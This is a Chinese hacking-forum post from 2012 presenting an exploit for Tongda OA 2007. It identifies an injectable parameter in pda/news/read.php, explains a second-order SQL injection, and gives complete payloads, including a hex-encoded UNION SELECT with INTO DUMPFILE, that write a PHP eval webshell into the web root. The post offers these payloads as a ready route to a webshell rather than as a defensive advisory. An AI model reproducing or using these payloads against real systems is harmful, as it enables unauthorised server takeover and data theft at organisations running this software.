找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3067|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本; A1 O7 Y, @9 J& C0 l; h( s

- B3 q1 x$ n* o4 H* [8 C 7 E" T2 g1 }0 U+ @7 r$ r
Office Anywhere 2007 网络智能办公系统9 D3 n9 \- N! m% j3 q: _" M
1 t2 W& u4 b6 t: q( o& I4 ^
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
' X/ t3 f/ }- `0 z+ Q , c; c, n! c' d& m* P) ^/ S
. m" u" o. ?! n1 Z+ q
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的  }* u4 l9 T& I9 c" g* W1 d8 U
: |* X3 R/ D6 E9 N$ }# M6 z$ d
例如:SELECT * from USER where USER_ID='{$USERNAME}'  
# P1 Z) c+ g" }% L$ E其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
  n' s* z+ V/ O) K- X
' r  r4 o: L2 t. j- d这个时候我们是不是可以组合起来使用哪?  {! j" s) I1 [) o9 C1 ]; j& b
0 R5 ]# P: {- ?5 _4 i: e
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样- l9 U: `6 s2 @$ ?
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
" Y. K0 o, D2 O, T; K: T5 F9 | 9 R) v! _0 I/ {. ~
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
% B7 C. n" R4 L3 u
6 T" @6 R. Y% B% j  v5 p; Q那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
( _, `8 P! d2 u
7 q- f+ F7 |9 ?8 w那么我们用字符串格式带入进行hex编码
1 n7 e6 q! O: w' s
" ~! Q8 {; O( l" g, L5 ^$ r0 X%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
" \2 R7 J8 K: ~. a" f% }
- D2 D2 y/ I  G3 E9 ~  {* X测试ok,获取oa的webshell7 s$ z" {" u* H
" f" Z+ \/ }- l" |" T; N
$ U/ o+ ^4 c1 N- U
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23) [# J. f; M; R. a0 l
直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表